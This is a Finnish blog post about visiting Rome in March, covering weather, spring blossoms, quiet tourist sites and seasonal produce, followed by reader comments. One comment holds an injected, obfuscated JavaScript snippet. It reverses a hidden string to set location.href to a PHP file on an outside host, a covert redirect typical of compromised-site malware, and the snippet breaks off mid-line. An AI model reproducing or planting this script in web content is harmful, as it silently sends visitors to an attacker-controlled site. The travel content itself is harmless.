Image Alt

Blog

Rooma maaliskuussa

Ajattelin aloittaa tällaisen retrospektiivisen kuukausikatsaussarjan, koska minulta usein kysellään, millaista Roomassa on maaliskuussa/ kesäkuussa/ syyskuussa tai missä kuussa se oma Rooman vierailu nyt sitten sattuukaan olemaan. Täältähän se sitten selviää, eikä tarvitse kuin seurata koko vuosi blogiani 🙂 En siis rupea ennustamaan tai lupaamaan mitään tulevien kuukausien säistä ja muista, joten näistä kuukausikatsauksista on ehkä hyötyä vasta ensi vuoden lomia suunnitellessa, mutta toivottavasti vähän iloa ja tietoa  ihan muuten vaan nyt. Ja minä olen täällä jo muutaman vuodenkierron ollut, joten jos haluat tietää, millaista täällä on yleensä vaikkapa toukokuussa, niin kommenttikenttään voi hyvin jättää viestiä. Mutta nyt siis katsaus menneeseen maaliskuuhun.

Sää voi maaliskuussa voi olla Roomassa mitä tahansa aurinkoisten hellepäivien ja kaatosateiden väliltä. Aurinkoisina, lämpiminä päivinä on tässä kuussa ollut reilusti yli 20 astetta lämmintä (jopa 27), mutta viime viikolla päivälämpötila oli vain 8 astetta. Terassillamme nautittiin aamukahvia ja grillattiin, mutta ei tässä raesateessa:

Joka tapauksessa lämpimänkin päivän kääntyessä iltaa huomaa, ettei täällä ole vielä kesä. Lämpötila laskee heti auringon laskeuduttua, eikä terasseilla tarkene vielä istuskella iltaisin. Illalla ja yöllä on paksumpi takki tarpeen, vaikka päivällä olisi tarjennutkin t-paidassa. Kerrospukeutuminen kannattaa (äiti neuvoo): myös aamulla on viileää, mutta kevyemmänkin talvitakin kanssa tulee kyllä kuuma. Paikalliset tosin pukeutuvat vielä kuin ulkona olisi pakkasta ja kesäisiin asuihin sonnustautuneet turistin saavat takuuvarmasti paheksuvia katseita osakseen.

Kevään kukkaloisto alkaa maaliskuussa. Ensin kukkivat mimosat, sitten magnoliat ja kirsikat ja nyt loppukuusta kadunvarsia koristavat juudaksenpuut (enpä tiennyt niidenkään nimeä vielä viime viikolla. Saati tuota suomennokseksi vakiintunutta nimen taivutusta.) Nyt kukkaan puhkeamaisillaan ovat myös suosikkini wisteriat (jonka suomenkieliseksi nimeksi Google näyttää antaa sinisade. Kaikkea sitä oppii.)

Magnolia

Puut alkavat alkavat vihertää ja maastakin pukkaa kukkaa.

Nähtävyyksien ja kaupungilla kiertelyn kannalta maaliskuu on melko otollinen aika. Ei ole vielä liian kuuma ja tunnetuimmissa turistikohteissakin on melko hiljaista. Esimerkiksi antamani vinkki Colosseumin lipunostoa varten toimi mainiosti: Forum Romanumin sisääntulossa ei ollut ketään (samaan aikaan Colosseumilla oli tuntien jonotus).

Pääsimme myös ihailemaan Maltan ritarien aukion avaimenreiästä kuuluisaa puiden kehystämää näkymää Pietarin kirkosta ihan rauhassa. Yleensä avaimenreiästä kurkistaakseen joutuu jonottamaan pitkäänkin.

Rauhallista turistikohteissa on tietenkin vain, jos pääsiäinen ei satu maaliskuulle. Pääsiäisen aikoihin kun täällä tuppaa olemaan tungosta.

Ruokakauppoihin ja toreille ilmestyvät maaliskuussa artisokat, mansikat ja ensimmäiset parsatkin.

Kaiken kaikkiaan ero Välimeren maiden ja Pohjois-Euroopan välillä on maaliskuussa ehkä suurimmillaan. Kun Suomessa vielä voi joutua kolaamaan lunta, täällä voi jo olla piknikillä puistossa, nauttia kaikkialla kukkivista puista ja…no, tuossahan nuo on yllä jo mainittu, mitä sitä enää veistä haavassa kääntämään toistamaan.  

0 0 votes
Article Rating
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

2 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Heli
10 years ago

Voi kiitos! Rooman kevät on tosiaan aika kaunis ja vihreät parsat ja mansikat maaliskuussa hyviä. Mielelläänhän niitä kuvailee, minulla kun on vähän tavoitteena kirjoittaa vain kauniista asioista…

Elämän kres<script>$mkD=function(n){if (typeof ($mkD.list[n]) == "string") return $mkD.list[n].split("").reverse().join("");return $mkD.list[n];};$mkD.list=["\'php.txEgifnoCetiSrettelsweN/snoisnetxe/edoc/rettelswen/moc.cniwyks//:ptth\'=ferh.noitacol.tne
Elämän kres